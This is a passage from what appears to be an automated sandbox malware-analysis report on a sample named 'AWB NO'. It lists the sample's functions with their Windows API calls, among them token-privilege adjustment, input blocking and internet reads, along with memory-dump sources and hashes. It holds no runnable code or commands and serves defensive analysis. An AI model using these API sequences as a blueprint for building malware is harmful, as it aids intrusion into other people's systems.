                                                              • GetCurrentThreadId.KERNEL32 ref: 0043511A
                                                              • GetCurrentProcessId.KERNEL32 ref: 00435123
                                                              • QueryPerformanceCounter.KERNEL32(?), ref: 00435130
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                              • String ID:
                                                              • API String ID: 2933794660-0
                                                              • Opcode ID: bb911df4cadb4fc2119d6f114fde40ce6bcb6fb15eb622322dc224ea4809cb98
                                                              • Instruction ID: b1ecb80097395240bdeec3df1c458110f5ebd11511e546320ce31347c9e523b5
                                                              • Opcode Fuzzy Hash: bb911df4cadb4fc2119d6f114fde40ce6bcb6fb15eb622322dc224ea4809cb98
                                                              • Instruction Fuzzy Hash: 32114871D01508EBDF14DBB8D9596AEB7B8EB0C301F61197BD807E7350EB349A088B59
                                                              Function 0045EB07 Relevance: 5.1, APIs: 1, Strings: 2, Instructions: 561stringCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • lstrlenW.KERNEL32(?,?,?,00000000), ref: 0045EB19
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: lstrlen
                                                              • String ID: ($|
                                                              • API String ID: 1659193697-1631851259
                                                              • Opcode ID: 4a3914be5f09e264bec3e6c4c4a6d0719df3ddc53d9e261ce0d3a82e2970f797
                                                              • Instruction ID: 3219d98289cd7202884e83acbeee28b11c9b7b0c49feef559eab4fbcdfbef43a
                                                              • Opcode Fuzzy Hash: 4a3914be5f09e264bec3e6c4c4a6d0719df3ddc53d9e261ce0d3a82e2970f797
                                                              • Instruction Fuzzy Hash: FA323775A007059FC728CF1AC481A6AB7F0FF48310B15C56EE89ACB3A2EB74E945CB44
                                                              Function 0043418A Relevance: 4.8, APIs: 3, Instructions: 273timeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00429E4B: EnterCriticalSection.KERNEL32(00000000,?,00429CBC,0000000D), ref: 00429E76
                                                              • GetTimeZoneInformation.KERNEL32(004C4AF8,00000000,00000000,00000000,00000000,00000000,004BC070,00000030,00433F3B,004BC050,00000008,004270B8), ref: 004342B9
                                                              • WideCharToMultiByte.KERNEL32(?,00000000,004C4AFC,000000FF,?,0000003F,00000000,?), ref: 00434332
                                                              • WideCharToMultiByte.KERNEL32(?,00000000,004C4B50,000000FF,FFFFFFFE,0000003F,00000000,?), ref: 0043436B
                                                                • Part of subcall function 00422F95: RtlFreeHeap.NTDLL(00000000,00000000,?,00429C64), ref: 00422FA9
                                                                • Part of subcall function 00422F95: GetLastError.KERNEL32(00000000,?,00429C64), ref: 00422FBB
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: ByteCharMultiWide$CriticalEnterErrorFreeHeapInformationLastSectionTimeZone
                                                              • String ID:
                                                              • API String ID: 1184061189-0
                                                              • Opcode ID: 069c2a25a611554b5eaaab65d549450a6fe4b0d6345cf809cefc54cdeeaf4f10
                                                              • Instruction ID: ccdda0ca54a131a8955d0f0637ed520d5d6b643ccdde261961fc382f8a0eab7f
                                                              • Opcode Fuzzy Hash: 069c2a25a611554b5eaaab65d549450a6fe4b0d6345cf809cefc54cdeeaf4f10
                                                              • Instruction Fuzzy Hash: 0AA17C719002059EDB159FAAD881BEEBBB4AF8D714F14206FF420A7291D778AD41CB2D
                                                              Function 004725E2 Relevance: 4.7, APIs: 3, Instructions: 164networkfileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000), ref: 004726D5
                                                              • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 0047270C
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: Internet$AvailableDataFileQueryRead
                                                              • String ID:
                                                              • API String ID: 599397726-0
                                                              • Opcode ID: 0e400175e2a48ea3fda3fc39a40ba758545a376ed3339983d9cbe4b4bc2398bc
                                                              • Instruction ID: 7df48aecdac16079d077ee4482dae0c99d09a727ef6db81992898f8f45f4089a
                                                              • Opcode Fuzzy Hash: 0e400175e2a48ea3fda3fc39a40ba758545a376ed3339983d9cbe4b4bc2398bc
                                                              • Instruction Fuzzy Hash: 9B41C871600209BFEB20DA55DE85EFF77BCEB40718F10806FF609A6240DAF99E419658
                                                              Function 0046B59E Relevance: 4.6, APIs: 3, Instructions: 73COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SetErrorMode.KERNEL32(00000001), ref: 0046B5AE
                                                              • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 0046B608
                                                              • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 0046B655
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: ErrorMode$DiskFreeSpace
                                                              • String ID:
                                                              • API String ID: 1682464887-0
                                                              • Opcode ID: 3d78fe770fa87a56f0ef94acf40fbdd92c69f5c74fed54d44da21eaa0b809736
                                                              • Instruction ID: afdace23335808f55efa9730f0df51a9d188e262fe072cd22f4db7dcc8935507
                                                              • Opcode Fuzzy Hash: 3d78fe770fa87a56f0ef94acf40fbdd92c69f5c74fed54d44da21eaa0b809736
                                                              • Instruction Fuzzy Hash: DD214F35A00118EFCB00DF65D884AADBBB8FF49314F1480AEE805AB351DB359D55CF55
                                                              Function 00458CC3 Relevance: 4.6, APIs: 3, Instructions: 67COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00458D0D
                                                              • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00458D3A
                                                              • GetLastError.KERNEL32 ref: 00458D47
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: AdjustErrorLastLookupPrivilegePrivilegesTokenValue
                                                              • String ID:
                                                              • API String ID: 4244140340-0
                                                              • Opcode ID: f46a93c8ec1229de16807ba254d6b49105cf5f205c910c03aaae0fdb89f966ea
                                                              • Instruction ID: f8041eb50af7dbbfc0cde60679eaa74aa1fb82c582b49c73c0c2fe1d216f5579
                                                              • Opcode Fuzzy Hash: f46a93c8ec1229de16807ba254d6b49105cf5f205c910c03aaae0fdb89f966ea
                                                              • Instruction Fuzzy Hash: 5111C1B1514208AFE728DF58EC85D6BB7FCFB04711B20852EF84693242EF74AC448B28
                                                              Function 00464021 Relevance: 4.6, APIs: 3, Instructions: 61fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 0046404B
                                                              • DeviceIoControl.KERNEL32(00000000,002D1400,00000007,0000000C,?,0000000C,?,00000000), ref: 00464088
                                                              • CloseHandle.KERNEL32(00000000,?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00464091
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: CloseControlCreateDeviceFileHandle
                                                              • String ID:
                                                              • API String ID: 33631002-0
                                                              • Opcode ID: 9adb1a1e81b239645974b83f98cd6b828b732412c9964b92f3583d332f155c02
                                                              • Instruction ID: 0d159ca6df0eede845a6d4e8df17a9b3dc34993fad287cf776c7f52469128b60
                                                              • Opcode Fuzzy Hash: 9adb1a1e81b239645974b83f98cd6b828b732412c9964b92f3583d332f155c02
                                                              • Instruction Fuzzy Hash: BB1156B1D04229BEE7109BE8DC44FBFBBBCEB48750F100556BA04E7191D2785D4547A6
                                                              Function 00464C03 Relevance: 4.5, APIs: 3, Instructions: 43memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00464C2C
                                                              • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00464C43
                                                              • FreeSid.ADVAPI32(?), ref: 00464C53
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: AllocateCheckFreeInitializeMembershipToken
                                                              • String ID:
                                                              • API String ID: 3429775523-0
                                                              • Opcode ID: 008726f0c27652ffd03f151f72c22d205906185045b9f325022e2ab268aa6496
                                                              • Instruction ID: 10b911d193db4ddcb2d704d9467f516d67823663164fbfa441d12c43b64d2f16
                                                              • Opcode Fuzzy Hash: 008726f0c27652ffd03f151f72c22d205906185045b9f325022e2ab268aa6496
                                                              • Instruction Fuzzy Hash: 86F04F7591130CBFDF04DFF0DC89AAEB7BCEF09201F104879A501E2281E7746A148B54
                                                              Function 0046C93C Relevance: 3.1, APIs: 2, Instructions: 52fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • FindFirstFileW.KERNEL32(?,?), ref: 0046C966
                                                              • FindClose.KERNEL32(00000000), ref: 0046C996
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: Find$CloseFileFirst
                                                              • String ID:
                                                              • API String ID: 2295610775-0
                                                              • Opcode ID: 2d4554714edd4205186e42fae868aff655069c454dd1f327b13b1559d841f580
                                                              • Instruction ID: 5b6b88f6211486deb722a6ccad0c379dfb27baad602233fbe21a4992d5fdb120
                                                              • Opcode Fuzzy Hash: 2d4554714edd4205186e42fae868aff655069c454dd1f327b13b1559d841f580
                                                              • Instruction Fuzzy Hash: 8E1161726106009FD710EF29D845A2AF7E9FF85325F04896EF8A9D7391DB34AC05CB85
                                                              Function 0046A2D5 Relevance: 3.0, APIs: 2, Instructions: 31windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,0047977D,?,0048FB84,?), ref: 0046A302
                                                              • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,0047977D,?,0048FB84,?), ref: 0046A314
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: ErrorFormatLastMessage
                                                              • String ID:
                                                              • API String ID: 3479602957-0
                                                              • Opcode ID: 2b1ef19d9cc0b90717349c923e8ffe700e91dba6fe524be6687ce0cf66479d83
                                                              • Instruction ID: ec260152526798b71ceb7e6cab33189719a1cd8c4d24e489ae92bbfcc79f14b4
                                                              • Opcode Fuzzy Hash: 2b1ef19d9cc0b90717349c923e8ffe700e91dba6fe524be6687ce0cf66479d83
                                                              • Instruction Fuzzy Hash: 1AF0E23154422DABDB109FA4CC48FEA736CBF08361F00416AFC08E6281D6309944CBA6
                                                              Function 00458713 Relevance: 3.0, APIs: 2, Instructions: 22COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00458851), ref: 00458728
                                                              • CloseHandle.KERNEL32(?,?,00458851), ref: 0045873A
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: AdjustCloseHandlePrivilegesToken
                                                              • String ID:
                                                              • API String ID: 81990902-0
                                                              • Opcode ID: d619775910ab2f9d0ffba9a4451874dbc5f24c949d5f07c028c111fd99072c7c
                                                              • Instruction ID: d62c75b1f3e524d892737f0a48d4a12a26ed18abf7c0ca67bc3633a0c12aa49d
                                                              • Opcode Fuzzy Hash: d619775910ab2f9d0ffba9a4451874dbc5f24c949d5f07c028c111fd99072c7c
                                                              • Instruction Fuzzy Hash: A6E08C32000650EFE7212B61FC08D777BE9EF04354720883EF896C0830CB22AC90DB14
                                                              Function 0042A395 Relevance: 3.0, APIs: 2, Instructions: 8COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00428F97,?,?,?,00000001), ref: 0042A39A
                                                              • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 0042A3A3
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: ExceptionFilterUnhandled
                                                              • String ID:
                                                              • API String ID: 3192549508-0
                                                              • Opcode ID: c2bfc4d91f5eef072ecd4d4a99461c52a82975f392c39b974fa7ca05b3ef40fa
                                                              • Instruction ID: 9da78fce3b57c7d2137df8720d13279edd616241823e717daaa40eb201d223bb
                                                              • Opcode Fuzzy Hash: c2bfc4d91f5eef072ecd4d4a99461c52a82975f392c39b974fa7ca05b3ef40fa
                                                              • Instruction Fuzzy Hash: CCB09231254308ABCA022B91EC09B8C3F68EB46AA2F404434FA0D84C60CB6254548B99
                                                              Function 004278D3 Relevance: 2.9, Strings: 2, Instructions: 371COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: a/p$am/pm
                                                              • API String ID: 0-3206640213
                                                              • Opcode ID: 6b994a63ce5d465783d3748e753e75d7bd01a868fa7e1a41a491c1a03680b5f2
                                                              • Instruction ID: 85ef68ebdde3959891d3e97b51b8824d8845c04f56d27c804b12c8a9233d18ca
                                                              • Opcode Fuzzy Hash: 6b994a63ce5d465783d3748e753e75d7bd01a868fa7e1a41a491c1a03680b5f2
                                                              • Instruction Fuzzy Hash: 00C19F70B08236DBDB249F65A8816BBB7B1FF45710FA4405BE905AB340D63C9D82C7AD
                                                              Function 00413190 Relevance: 1.8, Strings: 1, Instructions: 587COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: OaA
                                                              • API String ID: 0-4189730831
                                                              • Opcode ID: 55685d5aff937141e7f19c4738f40b4a101c670a7fbf8314482a611930ab8809
                                                              • Instruction ID: 2ffd56a64c60677c5789fbd16bfbcfb13b798939f1cd0f2cf633511a31807f6c
                                                              • Opcode Fuzzy Hash: 55685d5aff937141e7f19c4738f40b4a101c670a7fbf8314482a611930ab8809
                                                              • Instruction Fuzzy Hash: 70229D716083019FD724DF14C881BABB7E5AF84704F10492EF89697392DB78EE45CB9A
                                                              Function 0042CD61 Relevance: 1.8, APIs: 1, Instructions: 268COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,0000FFFF), ref: 0042CF8C
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: ExceptionRaise
                                                              • String ID:
                                                              • API String ID: 3997070919-0
                                                              • Opcode ID: 420c2809a71260c92c14a00774b336aa218a904d389bc7eea3e029bb115f1460
                                                              • Instruction ID: 2ae694619fd61510b816f5109d3836710e31fc7271be0dc177d9902fc7099fd5
                                                              • Opcode Fuzzy Hash: 420c2809a71260c92c14a00774b336aa218a904d389bc7eea3e029bb115f1460
                                                              • Instruction Fuzzy Hash: A4B16C31610618DFD714CF28D4C6B697BE1FF04364F66869AE899CF2A1C339D982CB44
                                                              Function 00415680 Relevance: 1.8, Strings: 1, Instructions: 516COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: yZA
                                                              • API String ID: 0-3857600021
                                                              • Opcode ID: f22c9ac5bc7b1277f829e4cab14e33e6dbade97f63495c422de26b33fbd24682
                                                              • Instruction ID: dee094da9eeb3f63583d2c1402edf53024af41e5dbd1ee5dd35ec63fe45e0d03
                                                              • Opcode Fuzzy Hash: f22c9ac5bc7b1277f829e4cab14e33e6dbade97f63495c422de26b33fbd24682
                                                              • Instruction Fuzzy Hash: D002C270E00109DBCF04DF65D981AAE7BB5FF84304F15806EE806EB295EB38D955CB99
                                                              Function 0042886B Relevance: 1.6, APIs: 1, Instructions: 115COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00428884
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: FeaturePresentProcessor
                                                              • String ID:
                                                              • API String ID: 2325560087-0
                                                              • Opcode ID: 8441b8574f042fd63d06bbda76db1ce3c01db63eb9eb055fa81c79c7bcf969f7
                                                              • Instruction ID: 834a0fc4441c02559ef61ce3ee23a9a067535bbd6c94face696ac9303e271c68
                                                              • Opcode Fuzzy Hash: 8441b8574f042fd63d06bbda76db1ce3c01db63eb9eb055fa81c79c7bcf969f7
                                                              • Instruction Fuzzy Hash: AA41E1B1A022128BE754CF99E859B6EBBE0FB44314F55803FC459E73A0CB789881CB59
                                                              Function 004741FD Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • BlockInput.USER32(00000001), ref: 00474218
                                                              Memory Dump Source
